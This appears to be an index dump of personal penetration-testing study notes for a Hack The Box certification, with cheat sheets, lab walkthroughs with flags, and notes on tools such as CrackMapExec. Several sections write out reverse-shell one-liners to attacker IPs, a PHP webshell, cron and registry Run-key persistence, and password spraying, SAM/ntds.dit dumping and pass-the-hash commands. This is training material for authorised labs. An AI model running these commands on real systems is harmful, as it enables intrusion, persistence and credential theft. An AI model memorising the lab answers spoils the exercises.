\u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"cpts-index/","title":"CPTS","text":"Number Module My notes Duration 01 Penetration Testing Process Penetration Testing Process 6 hours Introduction 02 Network Enumeration with Nmap (Almost) all about nmap 7 hours Reconnaissance, Enumeration & Attack Planning 03 Footprinting Introduction to footprinting Infrastructure and web enumeration Some services: FTP, SMB, NFS, DNS, SMTP, IMAP/POP3,SNMP, MySQL, Oracle TNS, IPMI, SSH, RSYNC, R Services, RDP, WinRM, WMI 2 days Reconnaissance, Enumeration & Attack Planning 04 Information Gathering - Web Edition Information Gathering - Web Edition. With tools such as Gobuster, ffuf, Burpsuite, Wfuzz, feroxbuster 7 hours Reconnaissance, Enumeration & Attack Planning 05 Vulnerability Assessment Vulnerability Assessment: Nessus, Openvas 2 hours Reconnaissance, Enumeration & Attack Planning 06 File Transfer techniques File Transfer Techniques: Linux, Windows, Code- netcat python php and others, Bypassing file upload restrictions, File encryption, Evading techniques when transferring files, LOLbas Living off the land binaries 3 hours Reconnaissance, Enumeration & Attack Planning 07 Shells & Payloads Bind shells, Reverse shells, Spawn a shell, Web shells (Laudanum and nishang) 2 days Reconnaissance, Enumeration & Attack Planning 08 Using the Metasploit Framework Metasploit, Msfvenom 5 hours Reconnaissance, Enumeration & Attack Planning 09 Password Attacks Password attacks 8 hours Exploitation & Lateral Movement 10 Attacking Common Services Common services: FTP SMB (tools: smbclient, smbmap, rpcclient, Samba Suite, crackmapexec, impacket-smbexec, impacket-psexec), Databases (MySQL and Attacking MySQL, MSSQL and Atacking MSSQL, log4j, RDP, DNS, SMTP 8 hours Exploitation & Lateral Movement 11 Pivoting, Tunneling, and Port Forwarding 2 days Exploitation & Lateral Movement 12 Active Directory Enumeration & Attacks 7 days Exploitation & Lateral Movement 13 Using Web Proxies 8 hours Web Exploitation 14 Attacking Web Applications with Ffuf 5 hours Web Exploitation 15 Login Brute Forcing 6 hours Web Exploitation 16 SQL Injection Fundamentals 8 hours Web Exploitation 17 SQLMap Essentials 8 hours Web Exploitation 18 Cross-Site Scripting (XSS) 6 hours Web Exploitation 19 File Inclusion 8 hours Web Exploitation 20 File Upload Attacks 8 hours Web Exploitation 21 Command Injections 6 hours Web Exploitation 22 Web Attacks 2 days Web Exploitation 23 Attacking Common Applications 4 days Web Exploitation 24 Linux Privilege Escalation 8 hours Post-Exploitation 25 Windows Privilege Escalation 4 days Post-Exploitation 26 Documentation & Reporting 2 days Reporting & Capstone 27 Attacking Enterprise Networks 2 days Reporting & Capstone","tags":["CPTS"]},{"location":"cpts-index/#practicing-steps","title":"Practicing Steps","text":"

                        Starting point:

                        • 2x Modules: The modules chosen should be categorized according to\u00a0two different difficulties:\u00a0technical\u00a0and\u00a0offensive.
                        • 3x Retired Machines: we recommend choosing\u00a0two easy\u00a0and\u00a0one medium\u00a0machines. At the end of each module, you will find recommended retired machines to consider that will help you practice the specific tools and topics covered in the module. These hosts will share one or more attack vectors tied to the module.
                        • 5x Active Machines: After building a good foundation with the modules and the retired machines, we can venture to\u00a0two easy,\u00a0two medium, and\u00a0one hard\u00a0active machine. We can also take these from the corresponding module recommendations at the end of each module in Academy.
                        • 1x Pro Lab / Endgame: These labs are large multi-host environments that often simulate enterprise networks of varying sizes similar to those we could run into during actual penetration tests for our clients.
                        ","tags":["CPTS"]},{"location":"cpts-index/#generic-cheat-sheet","title":"Generic cheat sheet","text":"","tags":["CPTS"]},{"location":"cpts-index/#basic-tools","title":"Basic Tools","text":"Command Description General sudo openvpn user.ovpn Connect to VPN ifconfig/ip a Show our IP address netstat -rn Show networks accessible via the VPN ssh\u00a0user@10.10.10.10 SSH to a remote server ftp 10.129.42.253 FTP to a remote server tmux tmux Start tmux ctrl+b tmux: default prefix prefix c tmux: new window prefix 1 tmux: switch to window (1) prefix shift+% tmux: split pane vertically prefix shift+\" tmux: split pane horizontally prefix -> tmux: switch to the right pane Vim vim file vim: open\u00a0file\u00a0with vim esc+i vim: enter\u00a0insert\u00a0mode esc vim: back to\u00a0normal\u00a0mode x vim: Cut character dw vim: Cut word dd vim: Cut full line yw vim: Copy word yy vim: Copy full line p vim: Paste :1 vim: Go to line number 1. :w vim: Write the file 'i.e. save' :q vim: Quit :q! vim: Quit without saving :wq vim: Write and quit","tags":["CPTS"]},{"location":"cpts-index/#pentesting","title":"Pentesting","text":"Command Description Service Scanning nmap 10.129.42.253 Run nmap on an IP nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP locate scripts/citrix List various available nmap scripts nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP netcat 10.10.10.10 22 Grab banner of an open port smbclient -N -L \\\\\\\\10.129.42.253 List SMB Shares smbclient \\\\\\\\10.129.42.253\\\\users Connect to an SMB share snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string Web Enumeration gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website curl -IL https://www.inlanefreight.com Grab website banner whatweb 10.10.10.121 List details about the webserver/certificates curl 10.10.10.121/robots.txt List potential directories in\u00a0robots.txt ctrl+U View page source (in Firefox) Public Exploits searchsploit openssh 7.2 Search for public exploits for a web application msfconsole MSF: Start the Metasploit Framework search exploit eternalblue MSF: Search for public exploits in MSF use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module show options MSF: Show required options for an MSF module set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option check MSF: Test if the target server is vulnerable exploit MSF: Run the exploit on the target server is vulnerable Using Shells nc -lvnp 1234 Start a\u00a0nc\u00a0listener on a local port bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/sh -i 2>&1\\|nc 10.10.10.10 1234 >/tmp/f Another command to send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/bash -i 2>&1\\|nc -lvp 1234 >/tmp/f Start a bind shell on the remote server nc 10.10.10.1 1234 Connect to a bind shell started on the remote server python -c 'import pty; pty.spawn(\"/bin/bash\")' Upgrade shell TTY (1) ctrl+z\u00a0then\u00a0stty raw -echo\u00a0then\u00a0fg\u00a0then\u00a0enter\u00a0twice Upgrade shell TTY (2) echo \"<?php system(\\$_GET['cmd']);?>\" > /var/www/html/shell.php Create a webshell php file curl 
http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an uploaded webshell Privilege Escalation ./linpeas.sh Run\u00a0linpeas\u00a0script to enumerate remote server sudo -l List available\u00a0sudo\u00a0privileges sudo -u user /bin/echo Hello World! Run a command with\u00a0sudo sudo su - Switch to root user (if we have access to\u00a0sudo su) sudo su user - Switch to a user (if we have access to\u00a0sudo su) ssh-keygen -f key Create a new SSH key echo \"ssh-rsa AAAAB...SNIP...M= user@parrot\" >> /root/.ssh/authorized_keys Add the generated public key to the user ssh\u00a0root@10.10.10.10\u00a0-i key SSH to the server with the generated private key Transferring Files python3 -m http.server 8000 Start a local webserver wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with\u00a0scp\u00a0(requires SSH access) base64 shell -w 0 Convert a file to\u00a0base64 echo f0VMR...SNIO...InmDwU \\| base64 -d > shell Convert a file from\u00a0base64\u00a0back to its orig md5sum shell Check the file's\u00a0md5sum\u00a0to ensure it converted correctly","tags":["CPTS"]},{"location":"cpts-labs/","title":"Lab resolution","text":""},{"location":"cpts-labs/#service-scanning","title":"Service scanning","text":"

                        Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?

                        sudo nmap -sC -sV -p8080 $ip \n

                        Results: Apache Tomcat

                        Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

                        sudo nmap -sC -sV $ip\n

                        Results: 2323

                        List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

                        smbclient \\\\10.129.125.178\\users -U bob\n# password: Welcome1 (given in the exercise description)\n\nsmb>dir\nsmb>cd flag\nsmb>get flag.txt\nsmb>quit\ncat flag.txt\n

                        Results: dceece590f3284c3866305eb2473d099

                        "},{"location":"cpts-labs/#web-enumeration","title":"Web Enumeration","text":"

                        Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

                        dirb http://94.237.55.246:55655/\n# Enumeration reveals http://94.237.55.246:55655/robots.txt\n

                        Go to http://94.237.55.246:55655/robots.txt and you will notice http://94.237.55.246:55655/admin-login-page.php

                        Visit it and, hardcoded in the page source, you will see:

                                        <!-- TODO: remove test credentials admin:password123 -->\n

                        Log in to the app.

                        Results: HTB{w3b_3num3r4710n_r3v34l5_53cr375}

                        There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit.

                        "},{"location":"cpts-labs/#public-exploits","title":"Public Exploits","text":"

                        Access the web app at http://$ip:36883

                        The title of the WordPress post is "Simple Backup Plugin 2.7.10", which names a well-known vulnerable plugin.

                        searchsploit Simple Backup Plugin 2.7.10\n
                        ----------------------------------------------------------- ---------------------------------\n Exploit Title                                             |  Path\n----------------------------------------------------------- ---------------------------------\nSimple Backup Plugin Python Exploit 2.7.10 - Path Traversa | php/webapps/51937.txt\n----------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n
                        sudo cp /usr/share/exploitdb/exploits/php/webapps/51937.txt .\nmv 51937.txt 51937.py\nchmod +x 51937.py\npython ./51937.py http://83.136.255.162:36883/ \"/flag.txt\" 4\n#  target_url = sys.argv[1]\n#  file_name = sys.argv[2]\n#  depth = int(sys.argv[3])\n

                        Results: HTB{my_f1r57_h4ck}

                        "},{"location":"cpts-labs/#privilege-escalation","title":"Privilege Escalation","text":"

                        SSH to $ip with user "user1" and password "password1". SSH into the server above with the provided credentials, and use '-p xxxxxx' to specify the port shown above. Once you log in, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

                        ssh user1@$ip -p 31459\n# password1\n\nsudo -l\n# User user1 may run the following commands on\n#        ng-644144-gettingstartedprivesc-udbk3-5969ffb656-cp248:\n#    (user2 : user2) NOPASSWD: /bin/bash\n\n# One way: write a small script and run it as user2 (the quotes keep the shell from treating #! as a comment)\necho '#!/bin/bash' > lala.sh\necho 'cat /home/user2/flag.txt' >> lala.sh\nchmod +x lala.sh\nsudo -u user2 /bin/bash lala.sh\n\n# Another\nsudo -u user2 /bin/bash -i\n

                        Results: HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

                        Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

                        Once you are user2, go to /root:

                        cd /root\nls -la\n
                        drwxr-x--- 1 root user2 4096 Feb 12  2021 .\ndrwxr-xr-x 1 root root  4096 Jun  3 19:21 ..\n-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history\n-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc\n-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile\ndrwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh\n-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo\n-rw------- 1 root root    33 Feb 12  2021 flag.txt\n

                        So we have read access to the .ssh folder; we can read and copy the private key:

                        cd .ssh\ncat id_rsa\n
                        -----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n....\nQfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==\n-----END OPENSSH PRIVATE KEY-----\n

                        On our attacker machine, save that id_rsa key to a local file:

                        echo \"the key\" > id_rsa\n

                        And now we can login as root

                        ssh root@$ip -p 31459 -i id_rsa\n

                        And cat the flag:

                        cat /root/flag.txt \n

                        Results: HTB{pr1v1l363_35c4l4710n_2_r007}

                        "},{"location":"cpts-labs/#nibbles-enumeration","title":"Nibbles - Enumeration","text":"

                        Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)

                        sudo nmap -sC -sV $ip\n

                        Results: 2.4.18

                        "},{"location":"cpts-labs/#nibbles-initial-foothold","title":"# Nibbles - Initial Foothold","text":"

                        Gain a foothold on the target and submit the user.txt flag

                        Enumerate resources

                        ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$ip/nibbleblog/FUZZ -H \"Host: $ip\"\n\ndirb http://$ip/nibbleblog/\n

                        Directory listing is enabled in several locations, and eventually we can browse to: http://$ip/nibbleblog/content/private/users.xml

                        We can identify the user admin.

                        We could also enumerate http://$ip/nibbleblog/admin.php

                        Login credentials are admin:nibbles (the password can be guessed from the box name).

                        Go to the Plugins tab and locate the My Image plugin: http://$ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

                        Upload a PHP reverse shell, then browse to http://$ip/nibbleblog/content/private/plugins/my_image/
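
                        One way to prepare that shell on a Kali box is to copy the bundled pentestmonkey shell and point it at our listener (a sketch: the webshell path assumes a default Kali install, and 10.10.14.2 is a placeholder attacker IP):

                        cp /usr/share/webshells/php/php-reverse-shell.php image.php\n# the shell defaults to $ip = '127.0.0.1' and $port = 1234; point the IP at your attacker machine\nsed -i 's/127.0.0.1/10.10.14.2/' image.php\n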

                        Set up a netcat listener:

                        nc -lnvp 1234\n

                        Click on the uploaded "image.php" and we will catch a reverse shell on the listener.
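
                        The shell we catch is non-interactive; one common way to upgrade it to a usable TTY (assuming python3 is present on the target; fall back to python otherwise):

                        python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n# then: ctrl+z, stty raw -echo, fg, enter twice\n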

                        whoami\n#nibbler\n\ncat /home/nibbler/user.txt\n

                        Results: 79c03865431abf47b90ef24b9695e14879c03865431abf47b90ef24b9695e148

                        "},{"location":"cpts-labs/#nibbles-privilege-escalation","title":"Nibbles - Privilege Escalation","text":"

                        Escalate privileges and submit the root.txt flag.

                        cd /home/nibbler\n
                        sudo -l\n

                        Results:

                        Matching Defaults entries for nibbler on Nibbles:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh\n

                        The nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges. Since we have full control over that file, if we append a reverse shell one-liner to the end of it and execute it with sudo, we should get a shell back as the root user.

                        unzip personal.zip\nstrings /home/nibbler/personal/stuff/monitor.sh\n
                        echo \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPattacker 8443 >/tmp/f\" | tee -a monitor.sh\n# double quotes so that $IPattacker expands; replace it with your attacker machine's IP\n

                        In the attacker machine, open a new netcat:

                        nc -lnvp 8443\n

                        Run monitor.sh with sudo

                        sudo ./monitor.sh\n

                        In the new netcat connection you are root.

                        cat /root/root.txt\n

                        Results: de5e5d6619862a8aa5b9b212314e0cdd

                        Alternative way: Metasploit

                        exploit/multi/http/nibbleblog_file_upload\n
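
                        A sketch of the module usage (option values taken from the credentials and paths found above; set LHOST to your own interface):

                        msfconsole -q\nuse exploit/multi/http/nibbleblog_file_upload\nset RHOSTS $ip\nset TARGETURI /nibbleblog\nset USERNAME admin\nset PASSWORD nibbles\nset LHOST tun0\nexploit\n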
                        "},{"location":"cpts-labs/#knowledge-check","title":"Knowledge Check","text":"

                        Spawn the target, gain a foothold and submit the contents of the user.txt flag.

                        sudo nmap -sC -sV $ip\n

                        Go to http://$ip/robots.txt

                        Go to http://$ip/admin

                        Enter admin:admin

                        Go to Edit Theme: http://$ip/admin/theme-edit.php

                        Add a pentestmonkey reverse shell to the theme and set a netcat listener on port 1234
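
                        For example:

                        nc -lnvp 1234\n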

                        Add gettingstarte.htb to your hosts file
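
                        For example (using the hostname exactly as given above):

                        echo \"$ip gettingstarte.htb\" | sudo tee -a /etc/hosts\n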

                        Open the blog and you will get a reverse shell

                        cat /home/mrb3n/user.txt\n

                        Results: 7002d65b149b0a4d19132a66feed21d8

                        After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.

                        "},{"location":"crackmapexec/","title":"CrackMapExec","text":"

                        Once we have access to a domain, CrackMapExec (CME) will allow us to sweep the network and see which users and machines we can access.

                        CME allows us to authenticate ourselves with the following protocols:

                        • smb
                        • ssh
                        • mssql
                        • ldap
                        • winrm

                        The most-used protocol is SMB, as port 445 is commonly open.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#installation","title":"Installation","text":"
                        sudo apt-get -y install crackmapexec\n
                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-usage","title":"Basic usage","text":"

                        Main syntax

                        crackmapexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>\n
                        # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targeting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Dump the SAM: extract local password hashes from the machine\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u Administrator -d . -H <hash> -x whoami\n
                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#rce-with-crackmapexec","title":"RCE with crackmapexec:","text":"
                        # If --exec-method is not defined, CrackMapExec will try the atexec method; if it fails, you can specify --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-technique","title":"Basic technique","text":"

                        Once we have access to a domain:

                        1. Enumerate users and machines from the machine we control: we will obtain all registered users and their hashes.

                        2. See if any of those users can access other machines in the domain, and check whether they have admin access.

                        3. The end goal is to dump ntds.dit.

                        With the krbtgt account's hash you can forge a golden ticket, and with a machine/service account hash such as DC$ you can forge a silver ticket.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#what-is-a-sam-hash-like","title":"What is a SAM hash like?","text":"

                        Take the Administrator one:

                        Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n

                        Basically, it has 4 parts:

                        user : RID : LM hash : NT hash\n

                        For the purpose of using the hash with CrackMapExec, we will use the NT hash (the last part).
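
                        For example, passing the NT part of the SAM entry above (note that 31d6cfe0d16ae931b73c59d7e0c089c0 happens to be the NT hash of an empty password):

                        crackmapexec smb $ip --local-auth -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0\n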

                        ","tags":["windows","dump hashes","passwords"]},{"location":"create-a-registry/","title":"Create a Registry","text":"

                        Registry Run keys on the victim machine can be used to persist a connection back to the attacker machine.

                        ","tags":["privilege escalation"]},{"location":"create-a-registry/#regedit","title":"Regedit","text":"
                        Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n\nRight-Button > New > String value\n\nWe name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>\n\nWe edit the registry and we add the path to the executable file and some commands\u00a0 in the Value data:\n\n\u201cC:\\Windows/System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\u201d\n\nFor instance: \u201cC:\\Windows/System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\u201d\n
                        ","tags":["privilege escalation"]},{"location":"create-a-registry/#python-script-that-add-a-binary-to-the-registry","title":"Python script that add a binary to the Registry","text":"

                        See Making your binary persistent

                        ","tags":["privilege escalation"]},{"location":"cron-jobs/","title":"Cron jobs","text":"

                        In Linux, a common form of maintaining scheduled tasks is through cron jobs. The equivalent in Windows would be a Scheduled Task. There are specific files and directories that we may be able to utilize to add new cron jobs if we have write permissions on them:

                        1. /etc/crontab

                        2. /etc/cron.d

                        3. /var/spool/cron/crontabs/root

                        Basically, the principle behind this technique is (see the sketch after this list):

                        • writing to a directory called by a cron job,
                        • and include a bash script with a reverse shell command,
                        • which should send us a reverse shell when executed.
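
                        A minimal sketch, assuming /etc/crontab is writable and 10.10.14.2:4444 is a placeholder listener:

                        # append a job that runs as root every minute\necho '* * * * * root /bin/bash -c \"bash -i >& /dev/tcp/10.10.14.2/4444 0>&1\"' >> /etc/crontab\n# catch it with: nc -lnvp 4444\n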
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"crunch/","title":"crunch - A dictionary generator","text":"

                        Crunch generates combinations of words and manglings to be used later as attack dictionaries.

                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#installation","title":"Installation","text":"

                        Preinstalled in Kali Linux. To install manually:

                        sudo apt install crunch\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#basic-commands","title":"Basic commands","text":"
                        # Generates words from <number1> to <number2> with the specified characters.\ncrunch <number1> <number2> <characters> -o file.txt\n# <number1>: minimum of characters that password has\n# <number2>: maximum of characters that password has\n# <characters>: those characters included in the set\n# -o: Send output to file.txt\n# There exists more flags\n
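
                        For example, to generate every candidate from 4 to 6 characters long out of a lowercase hexadecimal charset:

                        crunch 4 6 0123456789abcdef -o wordlist.txt\n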
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#resources","title":"Resources","text":"
                        • Advanced crunch: https://secf00tprint.github.io/blog/passwords/crunch/advanced/en.
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cryptography/","title":"Cryptography","text":"","tags":["crytography"]},{"location":"cryptography/#encryption-technologies","title":"Encryption Technologies","text":"Encryption Technology Description UNIX crypt(3) Crypt(3) is a traditional UNIX encryption system with a 56-bit key. Traditional DES-based DES-based encryption uses the Data Encryption Standard algorithm to encrypt data. bigcrypt Bigcrypt is an extension of traditional DES-based encryption. It uses a 128-bit key. BSDI extended DES-based BSDI extended DES-based encryption is an extension of the traditional DES-based encryption and uses a 168-bit key. FreeBSD MD5-based (Linux & Cisco) FreeBSD MD5-based encryption uses the MD5 algorithm to encrypt data with a 128-bit key. OpenBSD Blowfish-based OpenBSD Blowfish-based encryption uses the Blowfish algorithm to encrypt data with a 448-bit key. Kerberos/AFS Kerberos and AFS are authentication systems that use encryption to ensure secure entity communication. Windows LM Windows LM encryption uses the Data Encryption Standard algorithm to encrypt data with a 56-bit key. DES-based tripcodes DES-based tripcodes are used to authenticate users based on the Data Encryption Standard algorithm. SHA-crypt hashes SHA-crypt hashes are used to encrypt data with a 256-bit key and are available in newer versions of Fedora and Ubuntu. SHA-crypt and SUNMD5 hashes (Solaris) SHA-crypt and SUNMD5 hashes use the SHA-crypt and MD5 algorithms to encrypt data with a 256-bit key and are available in Solaris. ... and many more.","tags":["crytography"]},{"location":"cryptography/#symmetric-encryption","title":"Symmetric Encryption","text":"

                        A single shared secret key is used for both encryption and decryption.

                        ","tags":["crytography"]},{"location":"cryptography/#asymmetric-pki-encryption","title":"Asymmetric PKI Encryption","text":"

                        There is a key pair: a public key and a private key.

                        ","tags":["crytography"]},{"location":"cryptography/#digital-certificate","title":"Digital certificate","text":"

                        A digital certificate is an electronic document used to identify an individual, a server, an organization, or some other entity and associate that entity with a public key.

                        Digital certificates are used in PKI (public key infrastructure) encryption. We can think of a digital certificate as our \"online\" digital credential that verifies our identity.

                        Digital certificates are issued by Certificate Authorities (CA).

                        ","tags":["crytography"]},{"location":"cryptography/#emails","title":"Emails","text":"

                        Symmetric and asymmetric encryption don't guarantee Integrity, Authentication or Non-Repudiation. They only guarantee Confidentiality.

                        To achieve Integrity, Authentication and Non-Repudiation, emails use a digital signature.

                        ","tags":["crytography"]},{"location":"cryptography/#windows-encrypted-file-system","title":"Windows Encrypted File System","text":"

                        Windows Encrypted File System (EFS) allows us to encrypt individual files and folders. BitLocker, on the other hand, provides full-disk encryption.

                        Windows encryption uses a combination of symmetric and asymmetric encryption, whereby:

                        • A separate symmetric secret key is created for each file.
                        • A digital certificate is created for the user, which holds the user's private and public pair.

                        If the user's digital certificate is deleted or lost, encrypted files and folders can only be decrypted with a Windows Recovery Agent.

                        Let's see how it's decrypted:

                        Software-based encryption uses software tools to encrypt data: BitLocker, Windows EFS, VeraCrypt, 7-Zip.

                        ","tags":["crytography"]},{"location":"cryptography/#cipher-block-chaining-cbc","title":"Cipher block chaining (CBC)","text":"

                        Source: wikipedia

                        ","tags":["crytography"]},{"location":"ctr/","title":"ctr.sh","text":"

                        crt.sh collects information about SSL/TLS certificates from Certificate Transparency logs. If a domain serves a certificate, you can extract other subdomains listed in it by using the View Certificate functionality.

                        ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"ctr/#usage","title":"Usage","text":"

                        In your browser, go to:

                        https://crt.sh/
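
                        It can also be queried from the command line via its JSON output (a sketch; assumes jq is installed, and %25 is simply a URL-encoded % wildcard):

                        curl -s \"https://crt.sh/?q=%25.example.com&output=json\" | jq -r '.[].name_value' | sort -u\n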

                        ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"cupp-common-user-password-profiler/","title":"CUPP - Common User Password Profiler","text":"

                        The Common User Password Profiler (CUPP) generates a dictionary based on the input you provide when asked for names, dates, places, etc.

                        ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#installation","title":"Installation","text":"

                        Github repo: https://github.com/Mebus/cupp.

                        ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#basic-commands","title":"Basic commands","text":"
                        python cupp.py <flag options>\n#    -i      Interactive questions for user password profiling\n#    -w      Use this option to profile existing dictionary, or WyD.pl output to make some pwnsauce :)\n#    -l      Download huge wordlists from repository\n#    -a      Parse default usernames and passwords directly from Alecto DB. Project Alecto uses purified databases of Phenoelit and CIRT which were merged and enhanced.\n#    -v      Version of the program\n
                        ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"curl/","title":"curl","text":"","tags":["bash","tools","pentesting"]},{"location":"curl/#basic-usage","title":"Basic usage","text":"
                        curl -i -L $host -v\n# -L: Follow redirections\n# -i: Include headers in the response\n# -v: verbose\n\ncurl -T file.txt $host/uploads/\n# -T, --upload-file <file>: transfers the specified local file to the remote URL. -T uses the PUT HTTP method\n\ncurl -o target/path/filename URL\n# -o: specify a location/filename for the output\n\n# Upload a file via a POST form\ncurl -F \"Filedata=@./shellsample.php\" URL\n\n# Send a GET request\ncurl -X GET $ip\n\n# Send a HEAD request (headers only)\ncurl -I $ip\n\n# Send an OPTIONS request\ncurl -X OPTIONS $ip\n\n# Send a POST request with parameters name and password in the body data\ncurl -X POST $ip -d \"name=username&password=password\" -v\n\n# Upload a file with a PUT method\ncurl $ip/uploads/ --upload-file hello.txt\n\n# Delete a file\ncurl -X DELETE $ip/uploads/hello.txt\n
                        ","tags":["bash","tools","pentesting"]},{"location":"cve-common-vulnerabilities-and-exposures/","title":"cve","text":"

                        Common Vulnerabilities and Exposures (CVE) is a publicly available catalog of security issues sponsored by the United States Department of Homeland Security (DHS).

                        Each security issue has a unique CVE ID number assigned by the CVE Numbering Authority (CNA). The purpose of creating a unique CVE ID number is to create a standardization for a vulnerability or exposure as a researcher identifies it.

                        "},{"location":"cve-common-vulnerabilities-and-exposures/#stages-of-obtaining-a-cve","title":"Stages of Obtaining a CVE","text":"

                        Stage 1: Identify if CVE is Required and Relevant.

                        Stage 2: Reach Out to Affected Product Vendor.

                        Stage 3: Identify if Request Should Be For Vendor CNA or Third Party CNA.

                        Stage 4: Requesting CVE ID Through CVE Web Form.

                        Stage 5: Confirmation of CVE Form.

                        Stage 6: Receival of CVE ID.

                        Stage 7: Public Disclosure of CVE ID.

                        Stage 8: Announcing the CVE.

                        Stage 9: Providing Information to The CVE Team.

                        If an issue is not responsibly disclosed to a vendor, real threat actors may be able to leverage it for criminal use; such an undisclosed issue is also referred to as a zero-day (0-day).

                        "},{"location":"cvss-common-vulnerability-scoring-system/","title":"Common Vulnerability Scoring System","text":"

                        Source: Hack The Box Academy

